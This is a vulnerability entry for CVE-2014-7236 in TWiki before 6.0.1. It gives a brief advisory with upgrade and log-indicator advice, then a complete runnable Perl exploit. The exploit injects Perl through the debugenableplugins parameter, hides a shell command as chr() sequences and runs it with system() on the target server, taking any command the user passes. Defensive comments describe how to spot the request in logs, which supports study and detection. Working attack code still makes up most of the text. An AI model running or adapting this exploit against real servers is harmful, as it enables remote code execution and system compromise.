# CVE-2014-7236 TWiki before 6.0.1任意perl代碼執行漏洞
==INFO==
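Eval injection vulnerability in lib/TWiki/Plugins.pm in TWiki before 6.0.1 allows remote attackers to execute arbitrary Perl code via the debugenableplugins parameter to do/view/Main/WebHome. The issue affects releases before 6.0.1, so upgrading to 6.0.1 or later is the fix; on servers that cannot be upgraded immediately, requests carrying a debugenableplugins query parameter in the web-server access log are the indicator to review.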
==Usage==
perl exploit.pl host [cmd] ex. perl exploit.pl http://127.0.0.1/Main/WebHome "uname -a"
==EXP==
#!/usr/bin/perl
#
# TWiki code execution, CVE-2014-7236
# m0nad
# ref: http://seclists.org/fulldisclosure/2014/Oct/44
#
# Proof of concept for the eval injection reached through the
# `debugenableplugins` query parameter. It sends one GET request and prints
# whatever the server returns between two marker strings.
#
# Reading this as a defender:
#   * The request is recognisable in access logs by the `debugenableplugins=`
#     parameter whose value continues past the plugin name with `%3b`
#     (URL-encoded ';') followed by Perl statements such as `print(` /
#     `system(` and a chain of `chr(N).chr(N)...` terms.
#   * A response body containing `start_xpl` ... `end_xpl` means the injected
#     statement was evaluated on the server.
use LWP::Simple;
use strict;
use diagnostics;
use warnings;

# Print the tool banner.
sub banner {
    print "[*] TWiki code execution CVE-2014-7236\n",
          "[*] m0nad \n";
}

# Print the usage text and terminate.
# NOTE(review): the first usage line shows only "[cmd]"; the host argument
# placeholder appears to be missing from the string (the example line below
# it does pass a URL first) -- left as found.
sub usage {
    print "[?] usage: perl $0 [cmd]\n",
          "[?] ex. perl $0 http://127.0.0.1/Main/WebHome \"uname -a\"\n";
    exit;
}

# Build the request for $host with $cmd embedded, fetch it, and report the
# text found between the start_xpl / end_xpl markers.
#   $host - URL of the TWiki view page (e.g. .../Main/WebHome)
#   $cmd  - shell command string to wrap between the two marker echoes
sub exploit {
    my ($host, $cmd) = @_;

    # Bracket the command output with markers so it can be picked out of the
    # HTML response by the regex below.
    $cmd = "echo start_xpl &&" . $cmd . "&& echo end_xpl";

    # Encode every byte as chr(N) and join with '.', so the command reaches
    # the server as a Perl string expression with no quote characters in it.
    my @codes = unpack('C*', $cmd);
    my $byte  = join('.', map { "chr($_)" } @codes);

    # Parameter value = plugin name, then ';'-separated Perl statements
    # (%3b is ';', %28/%29 are '(' ')', %22 is '"').
    my $payload = "?debugenableplugins=BackupRestorePlugin%3bprint%28%22Content-Type:text/html\\r\\n\\r\\n%22%29%3bprint(system($byte))%3b%3bexit";

    my $res = get($host . $payload);

    # No markers in the response => the injected statement was not evaluated
    # (patched server, wrong URL, or the request failed).
    my $matched = $res =~ m/start_xpl\n(.*?)end_xpl/ms;
    print "[-] Exploit Failed\n" and exit unless $matched;
    print "[+] $1";
}

banner();
my $host = shift(@ARGV) || usage();
my $cmd  = shift(@ARGV) || "echo Vulnerable!";
exploit($host, $cmd);